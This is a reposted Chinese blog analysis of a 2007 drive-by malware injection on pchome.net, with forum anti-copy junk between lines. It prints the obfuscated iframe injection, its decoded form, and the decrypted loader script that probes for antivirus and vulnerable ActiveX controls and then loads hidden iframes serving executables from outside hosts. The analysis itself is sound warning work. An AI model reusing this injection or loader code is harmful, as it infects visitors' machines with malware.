该用户从未签到
|
截至2007-12-28 18:17 仍未修复
3 o- g& j6 b, L/ a2 J
# U- l& w' A* J( O1 z( v/ v9 [5 D# f& N3 p! {
##I#KE+X#D=$I#KE+XDI=KE+=X++D$IK#E#X+DI$KE+X=D=IK$E+$X=$D#I+$KEX$#DI+K#EXD=IKE+X#D#=I==K+E==XD+I#K$E$#X$D##I% h* v3 @1 A0 s* o0 u7 s8 H
7 v; w/ }& P, I! |从论坛看到的消息说pchome的某页面被挂马了,于是上去找,http://article.pchome.net/content-502393-7.html#topView' L- u3 ?7 S$ t2 f+ M9 c( z
6 S2 \4 I% a. b5 A
挂得比较隐蔽,http://btn.pchome.net/flash.js的中间被加入了如下代码:
, C0 B" R) p2 L' N0 F9 a! U8 u. h) V9 l% G4 P' B3 a
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');
, P3 t4 i/ S! g& Z8 ^0 x
- f. f8 K5 R+ q- J也就是这个了:5 B! F* R* [5 h6 p; r0 m w+ K
/ O ]: X% l- Gwindow["document"]["writeln"]('<iframe height=0 width=0 src="http://www.59.vc/page/add_644455.htm"></iframe>');
2 K0 F* @! ~! V ?5 Z; z
, e7 @, \. \8 ]: m1 C& v# G但只有这个js还不会使得那个iframe生效,使得他生效的是调用这个js显示flash 的代码:! e- ~" k- i# i% j2 f
$ P' g* C! h1 n/ m# f<script language="javascript" type="text/javascript">1 O3 u. e4 b$ g D7 f! [
writeflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");, i' t. T: Z) l# d4 m" L
</script>
/ \ s h; \) ]2 s
, w7 r; Y$ d) b* F0 ]5 |2 }有了这个,iframe就生效了;经过一番调用和解密后得:0 j0 A. z6 r% I# Z% ]
: i- C0 L& T( t9 ^" {
function bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=String.fromCharCode(65+i);kis6.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\Doc\\context.chm::/images/help.gif";kis7.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\Doc\\context.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)return true}return false}var Then=new Date();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);var aaffdasfascookie=new String(document.cookie);var cookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(new ActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframe style=display:none src="http://w18.vg/real.gif"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)document.write('<iframe style=display:none src="http://w18.vg/ms.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="http://w18.vg/xl.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src="http://w18.vg/lz.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('<iframe style=display:none src="http://w18.vg/bf.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="http://w18.vg/baidu.gif"></iframe>')}catch(e){}}
& E t! {' r4 z q0 a, q
5 o' @2 A5 Q2 n4 F3 yK##E+XD++IK+EX=#D$IKEXD+$I#KEXDI+K$EX$DI$$KE##X#DI=K+E$X=$DI#K+#EX=DIK=E$=XDIK=$EX=DIK$E$#X=D=I##KE#=X+$D+
! c, Q8 p. I3 K7 L+ }0 o) m
5 A/ Y( z, @9 r' U6 j& W! w/ B* p, `# D1 j$ S j- p0 X' A
挑了几个解密得:http://w18.vg/s.exe
: P& A' o+ K2 _
/ i% a- B5 o+ a9 L% R/ ~3 f从这个文件里面得到另外一个链接:http://w18.vg/ss.exe7 {$ @* W, ?0 k+ q2 O
0 z' G/ j; h8 P \' ]' b有点面熟的东西……% S& v0 `3 R, s& q, R) e1 J }
& E- X( M0 F1 V/ }6 C- h##K=E#X+D=IKE$XD$=I==K+#EXD=#I=KE$+XDI#K$=EX=D=#IK+E=X$D==I=#K=E##X$D$+IK=#EXD+IK$EX$=D+I+K#E$XD+IKEX#D# o+ R1 k6 m# K* r4 V5 f
5 F, c. q' {# J V: c从上面可以知道,出问题的是那个flash.js,因此所有使用这个js来放flash的页面全都有毒了!我随便找了几个页面,发现都是有毒的,这回可是大面积的被挂咯,同志们自己小心了。. ^0 X D# F1 V( q I1 s2 U# A
K$ k1 C% L( M) Q" O3 R
K$EX=+DI#$KE+X#DIK$EXD$I=KE$XD+#I+KEXD=I+KE=X$D=I=KEXD#=IK==E$X=D=I#+KEXD=IK#EX#DI=K=E=X=#DIKEXDI#KE
" r9 y4 J6 J- S+ V, }
/ v" Y9 p$ B/ q' f) b# T转载请保留声明!(http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html) + h/ `8 s2 A) M3 m `( D
1 ^8 y9 N' X* [# [# }
% E. g) ~! Q# K6 M' D作者dikex(六翼刺猬),原文链接:http://hi.baidu.com/dikex/blog/item/92f804c70762ead8d10060ff.html |
|